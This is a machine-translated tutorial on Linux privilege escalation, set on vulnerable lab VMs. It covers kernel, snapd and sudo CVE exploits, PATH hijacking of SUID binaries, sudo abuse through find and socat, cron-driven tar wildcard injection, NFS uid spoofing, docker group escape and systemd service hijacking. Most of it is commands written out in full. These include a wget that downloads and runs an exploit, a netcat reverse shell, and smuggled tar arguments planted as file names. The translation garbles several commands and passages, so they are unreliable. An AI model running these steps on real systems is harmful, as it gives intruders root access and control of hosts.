The article directories
- Introduction to the
-
- Summary of Common Commands
- Drone environment
- Linux entitlement method
-
- Linux entitlement vulnerability exploitation
-
- Dirty COW CVE-2016-5195 Vulnerability
- CVE – 2019-7304 holes
- CVE – 2019-13272 holes
- CVE – 2021-3156 holes
- Linux environment variables
-
- File special permission utilization
- View hidden files
- Sudo permission abuse
- Scheduling task assignment
-
- Write the parameters in the file name
- Low permission access to the network file system
-
- Unauthorized write
- Docker to ask right
- Systemd Configures rights lifting
-
- Systemd profile
- Systemd mention right
Introduction to the
You are advised to be familiar with the commands used in Linux information collection and penetration testing.
Summary of Common Commands
Common commands are briefly mentioned here
The command | role |
---|---|
uname -a |
View all system information |
ifconfig -a |
View all network information |
ps aux orps -elf |
Viewing Process Information |
id 或 who 或 w 或 last |
Viewing User Information |
crontab -l |
View the scheduled tasks of the current user |
Drone environment
For the following weights, I will mainly use two target planes
- Owasp_broken_web_apps_vm_1.2 (Default username account:
root
Password:owaspbwa
) Download address:Sourceforge.net/projects/ow… - Lin.security_v1.0 (default username Account:
bob
Password:secret
)Download address: www.vulnhub.com/entry/linse…
If you feel slow to download the official website, you can download the link from my Baidu web disk: pan.baidu.com/s/1uq-wQUIs… Extraction code: PANX
The owASP_BROKEN_web_apps_vm_1.2 environment uses the root user by default, so I have added a new user to it.
# add user xunmi and set the default command line to bash.
useradd -s /bin/bash -m xunmi
# set password for xunmi user (recommend setting a simple password for our own use)
passwd xunmi
# create xunmi home directory
mkdir /home/xunmi
# Transfer permissions to Xunmi
chown -R xunmi:xunmi /home/xunmi
Copy the code
There are some problems with the default keyboard and network environment of the security_v1.0 environment, so we need to configure it.
# select * from user root where user root is used.
sudo awk 'BEGIN {system("/bin/bash")}'
# Modify the keyboard layout
# Default \ symbol is shift+2
vim /etc/default/keyboard
# change XKBLAYOUT to us
Run the following command to restart the service
setupcon
Configure the nic.
vim /etc/netplan/50-cloud-init.yaml
Change enp0S3 to ENS33
Exit the configuration and restart the service
netplan apply
# Cut back to our regular users for convenience after lifting weights test
su - bob
Copy the code
Linux entitlement method
Right raising refers to a method of changing from a user with low permission to a user with high permission. So we need to at least make sure we’ve got low-access users on the target machine. Linux Vulnerability Information Collection: (github.com/SecWiki/lin…)
Linux entitlement vulnerability exploitation
Dirty COW CVE-2016-5195 Vulnerability
Major impact range :Linux kernel => 2.6.22 to 3.9 (x86/ X64) Vulnerability Detection: uname -a Check whether the Linux kernel is in this range. Download address: github.com/FireFart/di… Using the target machine: OWASP_BROKEN_web_APPS_vm_1.2 First we download the attack payload to the target machine
# https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c, this is against load file, if the file into the target machine on your own! The shell terminal I use (FinalShell) has a very convenient drag-and-drop import.
GCC dirty. C -o dirty GCC dirty. C -o lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
Grant permissions to generated files
chmod 777 dirty
# Run the file (followed by the desired password! This password replaces the password of the target root user.. / dirty passwordSelect * from 'root' where 'user' = 'root'; select * from 'root' where 'user' = 'root'
su -
Remember to restore the password file when you're done
mv /tmp/passwd.bak /etc/passwd
Copy the code
CVE – 2019-7304 holes
This is a Linux package manager SNAP local entitlement vulnerability, targeting some Ubuntu systems
Ubuntu Version: Ubuntu 18.10 Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 LTS Snap Version: 2.28 < SNAPd < 2.37
Vulnerability detection: snap –version Check whether the current version is within the specified range attack payload: github.com/initstring/… (v1: send the target key to the specified email address, v2: create a dirty_sock user with all sudo permissions!)
# here we use version V2
# empowerment first
chmod 777 dirty_sockv2.py
# in the use of
python3 dirty_sockv2.py
You can log in to the dirty_sock user (password is also dirty_sock)
su - dirty_sock
You can use sudo to run any command as the root user.
sudo su
Copy the code
CVE – 2019-13272 holes
Main scope of impact :Linux kernel => 4.10 ~ 5.1.17 Attack payload description mainly for the following versions of the system can be raised (I do not currently have the target of the following systems, so I did not reproduce this vulnerability)
// -ubuntu 16.04.5 kernel 4.15.0-29-generic // -Ubuntu 18.04.1 kernel 4.15.0-20-generic // -Ubuntu 19.04 kernel 5.0.0-15-generic // – Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic // – Linux Mint 19 kernel 4.15.0-20-generic // – Xubuntu 16.04.4 kernel 4.13.0-36-generic // – ElementaryOS 0.4.1 4.8.0-52-generic // – Backbox 6 kernel 4.18.0-21- Generic // – Parrot OS 4.5.1 kernel 4.19.0-parrot1-13T-amd64 // – Kali kernel 4.19.0-kali5-amd64 // – Redcore 1806 (LXQT) kernel 4.16.16-redcore // -mx 18.3 kernel 4.19.37-2~mx17+1 // -RHEL 8.0 kernel 4.18.0-80.el8.x86_64 // – Debian 9.4.0 kernel 4.9.0-6-amd64 // -debian 10.0.0 kernel 4.19.0-5-amd64 // -devuan 2.0.0 kernel 4.9.0-6-amd64 // – SparkyLinux 5.8 kernel 4.19.0-5- AMd64 // – Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64 // – Manjaro 18.0.3 kernel 4.19.23-1-manjaro // – Mageia 6 kernel 4.9.35-desktop-1.mga6 // – Antergos 18.7 kernel 4.17.6-1-arch
Attack payload: www.exploit-db.com/exploits/47… Download it at https://www.exploit-db.com/download/47163
Download the attack payload
wget https://www.exploit-db.com/download/47163 -O exp.c
# compile the target
gcc exp.c -o exp
# Start lifting rights
./exp
Copy the code
CVE – 2021-3156 holes
Sudo 1.8.2~1.8.31 P2, SUDO 1.9.0~1.9.5 P1
Vulnerability detection:sudoedit -s /
Error messagesudoedit
This risk may exist at the beginning if theusage
At the beginning, there is no risk. In addition to these two cases, there may be an error due to the lack of permission to use sudo!
Download address: Github.com/blasty/CVE-…
The conditions for using this vulnerability are relatively strict. First of all, we need users to have certain sudo permissionssudo -l
Secondly, a security mechanism of Linux also has a great impact on the exploitation of this vulnerability. This security mechanism causes the service to be in a different memory area each time it is started. However, this vulnerability can only be exploited by knowing the memory offset of our SUdo service. The exploit script below allows us to use brute force to find Sudo’s location.
Download address: Github.com/lockedbyte/…
This script is also relatively simple to use, but it should be noted that this script should be written in the Windows environment, I uploaded to Linux when there are some coding problems, hint/bin/bash^M: bad interpreter: No such file or directory
If you have similar problems, you need to change the code first
# First vim opens the file we need to execute
vim exp.sh
# Edit file, execute
:set ff=unix
# exit edit
:wq
Run the script
./exp.sh
Copy the code
The script will then begin the exhaustive attack.
Linux environment variables
View all environment variables
export
View the environment variable path
echo $PATH
Copy the code
The commands we use in Linux are executable files, and the Linux system uses the path specified by these environment variables to quickly locate the commands we want to execute. For example, if I want to execute an ls command, we actually execute the /bin/ls executable file, and the system relies on the path we set in the environment variable /bin to find the ls and execute.
The execution is prioritized from front to back, as shown in figure 1/usr/local/sbin
Find in pathls
, will be used/usr/local/sbin
In the pathls
Rather than/bin
In the. And we mainly need to use this feature to complete the weight lifting.
Add environment variables temporarily (from scratch)
exportPATH = PATH:$PATH
# add to tail
export PATH=$PATHPath:Copy the code
File special permission utilization
I am inCommon Linux penetration test commandsLinux has several special permissions, which are mainly used for owner runningsetuid
And the owner groupsetgid
If we know that the owner or owner group of the executable file that has been run by the owner or owner group has administrator rights and will call those commands, we can try to align the command to do the replacement processing to achieve the purpose of raising the rights.
So let’s say I have a file like this,
#include<unistd.h>
#include<stdlib.h>
void main(){
setuid(0);
setgid(0);
system("ps");
}
Copy the code
We compiled it into an executable and gave it to the owner to execute!
GCC ps.c -O test CHmod 4777 test LS -LCopy the code
The above condition is just a test condition I set up. Under normal circumstances, if you encounter a similar situation, you can try this execution method
# find the above method of such a file
# from root (/), find owner (4000) or owner group (2000) or both owner and owner group (6000) file (f), and automatically delete all errors (2>/dev/null, 2 is all error messages,/dev/null is an empty file in Linux)
find / -perm -4000 -type f 2>/dev/null
# Detailed information version
find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
Copy the code
From the owner execution file above, we can see that the target invokes the ps command, at which point we can use the environment variable to replace the file that the target wants to execute with the command that we want to execute
If the current user does not have his/her own folder, create a temporary folder in/TMP.
echo "/bin/bash" > ps
# give weights to the photoshop files we created
chmod 777 ps
# Add environment variables (currently my ps is in /home/bob!)
export PATH=/home/bob:$PATH
Copy the code
Suid command summary site (gtfobins): gtfobins.github.io/#+suid
In addition to the above use, we can also find some system commands to use, such as the following we find the owner of the execution filetaskset
Command, at this time we can use the vulnerability of this command to raise rights
Taskset Indicates the taskset command: Gtfobins. Making. IO/gtfobins/ta…
View hidden files
# Linux hidden files will be used. Start, so use ".*" to match hidden files
find / -name ". *" -type f 2>/dev/null
View the details version, and only view the hidden files in the /home path
find / -name ". *" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null
# or
find /home -name ". *" -type f -exec ls -al {} \; 2>/dev/null
Copy the code
Sudo permission abuse
The prerequisite for sudo abuse is that you know the plaintext password of the current logged-in user!
In Linux, most of the commands can only be used by the administrator. If you want to execute some administrator commands without logging in to the administrator account, you need to use the sudo permission. If you have all the sudo permission, you are basically the same as the Root user. usesudo -l
Command to view the permissions of the current user. The following two types of prompts are all sudo permissions and none sudo permissions respectively.
If the user you have found has all the sudo permissions, then congratulations, Bao CAI, you have a ghost. The inputsudo su
Command to get root, but normally I wouldn’t be so lucky.
Most of the time, we’ll probably run into something like the following that tells us what permissions the current user has to execute with sudo. If you pick up another ghost, there is/bin/bash
or/bin/sh
Such orders can also be directly raised power.
Sudo will most likely give the user the power, except in the case of a ghost picked up abovefind
Permissions are easy for users to find, orftp
.git
“And so on.
Collection of Option Orders Website (GTFobins): gtfobins.github.io/#+sudo
For example, we usefind
Right to mention
# https://gtfobins.github.io/gtfobins/find/#sudo
# in the current directory (.) Run (-exec)/bin/bash and exit (-quit); Means to execute another command,\ is; The escape character of
sudo find . -exec /bin/bash \; -quit
# socat will also work, and I won't demonstrate the rest
# stdin is standard input
sudo socat stdin exec:/bin/sh
Copy the code
Scheduling task assignment
When we get a low-privileged user, we usually check to see if they have a scheduled task, as shown below
# Check the scheduled tasks in the current system
cat /etc/crontab
# Check the file type (shell script is best)File Execution file of the scheduled task# Check current file permissionsLs -l Execution file of the scheduled taskCopy the code
First of all, we can see that there is a scheduled task executed every minute in the system, and this scheduled task is a script, but we only have the read permission of this script
This scheduled task compresses and backs up all subdirectories in the home directory/etc/backups
In the directory
Write the parameters in the file name
To exploit this vulnerability we need to know a feature of Linux if we have a name forParameters -
File, and the original parameters conflict! As shown below, I created a file named--help
File, but I usecat --help
Unable to view the file, the help command is triggered.
Here we use MSF to generate a local rebound command
This command generates a rebound shell commandMsfvenom -p CMD/Unix /reverse_netcat lhost=127.0.0.1 lport=8888 RIf you do not execute the above command, you can use my generated commandmkfifo /tmp/mpuo; Nc 127.0.0.1 8888 0 < / TMP/mpuo | / bin/sh > / TMP/mpuo 2 > &1; rm /tmp/mpuoCopy the code
In the above scheduled task, we found that our current user’s directory is among the files that are regularly backed up
# A scheduled task for each execution
for i in $(ls /home); do cd /home/$i && /bin/tar -zcf /etc/backups/home-$i.tgz *; done
/home = /home = /home = /home = /home = /home = /home = /home = /home = /home
for i in $(ls /home)
# Then the CD goes to Bob's home directory
cd /home/bob
Back up all files in Bob's home directory.
/bin/tar -zcf /etc/backups/home-bob.tgz *
Copy the code
Exploit:
Write the generated local rebound shell command to the script
echo "mkfifo /tmp/mpuo; Nc 127.0.0.1 8888 0 < / TMP/mpuo | / bin/sh > / TMP/mpuo 2 > &1; rm /tmp/mpuo" > shell.sh
Execute a script
echo > "--checkpoint=1"
# execute the script target (execute the shell script, the bounce command we generated above)
echo > "--checkpoint-action=exec=sh shell.sh"
After the above command is created, the package command will look like the following when the backup package is executed again
# tar -zcf /etc/backups/home-bob.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh shell.sh
# Listen to our rebound interface
nc -lvvp 8888
Copy the code
Low permission access to the network file system
Network File System(NFS) allows computers on a Network to share resources over a TCP/IP Network. In NFS applications, the local NFS client application can transparently read and write files on the remote NFS server, just like accessing local files. Similar to networking in Windows, this function is enabled on port 2049 by default. We can use the following nmap command to find the target machine
nmap -sS -T4 -p- Destination addressCopy the code
Install the NFS service
apt-get install nfs-common
Read permissionsShowmount -e Indicates the destination address# Mount localMount Destination address: directory to be mounted remotely Local directoryCopy the code
Once the mount is complete, we can see the target file, but we don’t have write permission to this directory because my super admin user is compressed to an anonymous user.
Unauthorized write
If we first write files to the host of the other party, we can forge the user of the host of the other party to achieve this. Firstly, according to the above information obtained when we map files, the target mapping file belongs to Peter user, and the uid and GID of this user are 1001 and 1005. We create a similar user locally
Select * from user where username = 'Peter' and username = '1005';
groupadd -g 1005 peter
Create Peter user and add it to Peter group
adduser peter -uid 1001 -gid 1005
# Check Peter's information
cat /etc/passwd |grep peter
Copy the code
The file can then be written to the target machine
Docker to ask right
Prerequisite: 1. The target machine belongs to docker group. 2.
After the preceding conditions are met, you only need to enterdocker run -v /:/hostOS -i -t chrisfosterelli/rootplease
You can try to lift the right
Systemd Configures rights lifting
Systemd profile
In many previous versions of Linux, the service was associated with the init process, which was started by typing the following command
# assume that the apache2 service is started here
sudo /etc/init.d/apache2 start
# or
service apache2 start
Copy the code
The init process is inefficient because it is designed to use serial startup and is only responsible for starting service scripts. Systemd exists to solve these problems. Systemd is not a command, but a set of commands to manage the system. Systemctl is the main command of Systemd
Restart the system
$ sudo systemctl reboot
# Shut down the system and power off
$ sudo systemctl poweroff
Check the startup time
$ systemd-analyze
Copy the code
Systemd mention right
In fact, the systemd privilege is similar to the file special privilege mentioned above. First, we still need to find a target that can be executed with the super administrator province, which I use here/lib/systemd/system
Under thedebug.service
Because we are currentlypeter
The user is aligned with writable permissions.
View this service configuration can be seen, the current service will be super administrator (root) province to execute a file, then we just change the target file we want to execute the command, and restart the service can!
Go back to the user's home directory
cd ~
# escape \n like character (-e), copy /bin/bash to /home/peter/admin console, and give it 6755
Save it in an 'administrator console.sh' file and give it execution permission
echo -e '#! /bin/bash \ NCP /bin/bash /home/pett/admin console \nchmod 6755 /home/pett/admin console '> /home/peter/Administrator console sh && chmod +x Administrator console shModify the debug configuration file
vim /lib/systemd/system/debug.service
# ExecStart= assign to/home/peter/Admin console. shCopy the code
But after the restart of the service on the need for other means, is not in line to wait for the administrator that day to restart the system! After a reboot, we should see something like the followingAdministrator console
This is not a direct executionAdministrator console
Instead, we need to execute/ Administrator console -p
To obtain root privileges!